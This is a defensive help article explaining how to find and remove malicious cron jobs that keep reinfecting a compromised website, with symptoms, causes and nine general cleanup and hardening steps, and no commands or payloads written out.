Introduction

A site that looks clean for a few minutes and then gets infected again often still has a persistence mechanism. Cron is a common one: an attacker plants a scheduled task that downloads malware, rewrites a backdoor, or restores a malicious file after you delete it. The fix is to identify the scheduled job, remove it safely, and clean the payload it keeps reintroducing.

Symptoms

  • Malicious files reappear after deletion or cleanup
  • Redirects, spam pages, or backdoors return at regular intervals
  • Security scans look clean briefly, then detect the same compromise again
  • Unfamiliar scripts run from temporary folders, uploads, or hidden paths
  • The server was recently cleaned, but suspicious outbound requests continue

Common Causes

  • A malicious cron entry downloads or restores a backdoor on a schedule
  • The attack added persistence under the site user, root, or a control panel account
  • A cleanup removed visible malware files but missed the task that recreates them
  • Compromised scripts are stored in multiple locations and one scheduled job rebuilds the others
  • A hostile command is hidden inside a legitimate-looking maintenance job

Step-by-Step Fix

  1. Isolate the site if necessary so reinfection does not keep affecting visitors while you investigate persistence.
  2. Review scheduled tasks for the site user, system-wide cron locations, and hosting control panel jobs to find unfamiliar commands or scripts.
  3. Trace every suspicious cron command to the file or remote source it executes rather than deleting entries without understanding what they restore.
  4. Preserve copies of malicious commands and payload paths for incident analysis, then remove the cron persistence from the affected accounts.
  5. Delete or quarantine the scripts, web shells, or downloaded files that the cron job was recreating.
  6. Rotate credentials and review how the attacker obtained write access, because cron persistence is often only one part of the compromise.
  7. Scan the rest of the site and server for adjacent persistence methods such as startup scripts, plugin backdoors, rogue admin users, or modified scheduled tasks in the application.
  8. Monitor file changes, outbound requests, and scheduled task lists after cleanup to confirm the reinfection pattern has stopped.
  9. Finish with patching, credential hygiene, and access hardening so the same attacker cannot simply recreate the cron job again.